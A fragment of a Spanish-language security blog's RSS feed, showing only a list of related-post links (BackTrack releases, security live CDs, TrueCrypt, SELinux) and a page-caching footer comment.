href="http://www.dragonjar.org/descargar-backtrack-4-r1.xhtml" title="Descargar BackTrack 4 R1">Descargar BackTrack 4 R1</a></li><li><a
href="http://www.dragonjar.org/laboratorios-de-seguridad-informatica.xhtml" title="Laboratorios de Seguridad Informática">Laboratorios de Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/los-mejores-live-cds-de-seguridad-en-un-solo-dvd.xhtml" title="Los Mejores Live CD&#8217;s de Seguridad en un Solo DVD">Los Mejores Live CD&#8217;s de Seguridad en un Solo DVD</a></li><li><a
href="http://www.dragonjar.org/backtrack-4-r2.xhtml" title="BackTrack 4 R2">BackTrack 4 R2</a></li><li><a
href="http://www.dragonjar.org/truecrypt-cifra-tu-informacion-en-particiones-virtuales.xhtml" title="TrueCrypt &#8211; Cifra tu información en particiones virtuales">TrueCrypt &#8211; Cifra tu información en particiones virtuales</a></li><li><a
href="http://www.dragonjar.org/selinux-asegurar-linux.xhtml" title="SElinux &#8211; Asegura tu Distribución GNU/Linux Preferida">SElinux &#8211; Asegura tu Distribución GNU/Linux Preferida</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/por-fin-backtrack-20-final.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 32/111 queries in 0.150 seconds using disk: basic
Object Caching 5347/5473 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 22:28:23 -->
